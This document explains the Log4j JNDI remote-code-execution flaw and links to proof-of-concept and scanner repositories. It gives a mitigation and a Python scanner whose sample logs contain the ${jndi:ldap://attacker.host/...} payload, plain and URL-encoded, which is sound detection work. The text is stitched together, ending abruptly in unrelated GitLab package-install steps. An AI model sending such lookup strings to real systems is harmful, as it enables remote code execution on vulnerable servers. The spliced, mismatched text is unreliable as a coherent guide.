
How it works:
- An attacker sends a specially formed string such as ${jndi:ldap://attacker.host/blabla} to any input that may end up in a log message.
- When Log4j formats that message, JNDI (Java Naming and Directory Interface) processes the lookup and requests data over LDAP from attacker.host.
- The LDAP response points to a Java class, which the vulnerable JVM loads and runs, giving arbitrary code execution.
PoC: https://github.com/tangxiaofeng7/apache-log4j-poc
Log4j2 RCE BurpSuite Plugin: https://github.com/whwlsfb/Log4j2Scan
Which vendors and products are affected: https://github.com/YfryTchsGD/Log4jAttackSurface
Temporary mitigation (Log4j 2.10 and later only): start the JVM with JAVA_OPTS="-Dlog4j2.formatMsgNoLookups=true". This only disables message lookups and was later shown to be an incomplete fix, so the real fix is upgrading to a patched Log4j release.
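As an added example that is not part of the original post, here is the detection side of the mechanism described above: a small Python scanner that URL-decodes each access-log line and reports the scheme and callback host of any ${jndi:...} lookup string, which is what a defender would search existing logs for. The log lines and the host name attacker.host are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). Line 2 carries the
# lookup in the User-Agent field; line 3 carries it URL-encoded in the query string.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.host/blabla}"
10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=%24%7Bjndi%3Aldaps%3A%2F%2Fattacker.host%3A636%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.64"
"""

# A lookup starts with "${", optional whitespace, "jndi:" (any case), then the
# scheme and the callback host. Only the plain form the post describes is matched.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//\s*(?P<host>[^/:}\s]+)",
    re.IGNORECASE,
)


def normalize(line):
    """Undo up to two layers of URL-encoding so encoded query strings are inspected too."""
    return unquote(unquote(line))


def find_jndi_lookups(line):
    """Return a list of (scheme, host) for every JNDI lookup string found in one line."""
    return [(m.group("scheme").lower(), m.group("host"))
            for m in JNDI_RE.finditer(normalize(line))]


def scan_log(text):
    """Return [(line_number, scheme, host)] for each log line carrying a lookup string."""
    hits = []
    for n, line in enumerate(text.splitlines(), start=1):
        for scheme, host in find_jndi_lookups(line):
            hits.append((n, scheme, host))
    return hits


if __name__ == "__main__":
    for n, scheme, host in scan_log(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup via {scheme} to {host}")
```

The reported hosts are the callback endpoints to block at the egress firewall and to search for across the rest of the estate.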
If you get an “Unable to locate package gitlab-ee” error message, as shown in the screenshot below:

Run the following two commands:
Note: don’t forget to replace the domain in EXTERNAL_URL with your own.
- curl -L -o gitlab-ee_13.0.6.deb https://packages.gitlab.com/gitlab/gitlab-ee/packages/debian/buster/gitlab-ee_13.0.6-ee.0_amd64.deb/download.deb
- sudo EXTERNAL_URL="http://gitlab.mcnz.com" apt install ./gitlab-ee_13.0.6.deb